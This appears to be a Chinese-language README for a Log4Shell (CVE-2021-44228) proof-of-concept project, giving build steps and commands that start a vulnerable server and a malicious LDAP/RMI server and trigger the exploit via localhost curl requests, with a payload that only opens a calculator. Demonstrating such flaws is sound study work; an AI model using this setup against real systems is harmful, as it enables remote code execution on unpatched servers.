演示项目,用于展示如何利用 log4j(CVE-2021-44228)漏洞
使用 Spring Boot 只是为了快速搭建。请原谅所有硬编码,这只是一个 POC。
确保已安装 Java 8。使用 Maven 构建 mvn clean package -DskipTests。在单独的 shell 窗口中运行以下命令:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
这将执行 Exploit 类中的代码(它只会打开计算器)